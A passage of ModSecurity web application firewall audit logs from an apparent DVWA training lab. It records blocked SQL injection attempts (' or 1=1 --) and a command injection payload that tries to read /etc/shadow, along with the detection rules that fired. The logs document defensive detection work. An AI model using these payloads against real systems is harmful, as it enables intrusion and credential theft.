[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQkX8AAQEAAAkW4RYAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQkX8AAQEAAAkW4RYAAAAB\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":718,"p2":3098,"p3":0,"p4":0,"p5":203,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:56:35 --0400","transaction_id":"WRcQk38AAQEAAAkW4RcAAAAB","remote_address":"192.168.75.130","remote_port":46198,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27+or+1%3D1+--+%22&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. 
detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQk38AAQEAAAkW4RcAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. 
detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQk38AAQEAAAkW4RcAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQk38AAQEAAAkW4RcAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQk38AAQEAAAkW4RcAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQk38AAQEAAAkW4RcAAAAB\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":389,"p2":2202,"p3":0,"p4":0,"p5":118,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:56:38 --0400","transaction_id":"WRcQln8AAQEAAAkW4RgAAAAB","remote_address":"192.168.75.130","remote_port":46198,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27+or+1%3D1+--+%22&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. 
detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQln8AAQEAAAkW4RgAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. 
detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQln8AAQEAAAkW4RgAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQln8AAQEAAAkW4RgAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQln8AAQEAAAkW4RgAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQln8AAQEAAAkW4RgAAAAB\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":388,"p2":2135,"p3":0,"p4":0,"p5":120,"sr":17,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:57:33 --0400","transaction_id":"WRcQzX8AAQEAAAkXs@IAAAAC","remote_address":"192.168.75.130","remote_port":46232,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1402","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRcQzX8AAQEAAAkXs@IAAAAC\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":718,"p2":2422,"p3":193,"p4":541,"p5":84,"sr":29,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:57:34 --0400","transaction_id":"WRcQzX8AAQEAAAkXs@MAAAAC","remote_address":"192.168.75.130","remote_port":46232,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1402","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRcQzX8AAQEAAAkXs@MAAAAC\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":627,"p2":1526,"p3":80,"p4":371,"p5":76,"sr":21,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:57:44 --0400","transaction_id":"WRcQ2H8AAQEAAAkYuEYAAAAD","remote_address":"192.168.75.130","remote_port":46234,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"43"},"body":["ip=%27%3B+cat+%2Fetc%2Fshadow&Submit=Submit"]},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/exec/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. 
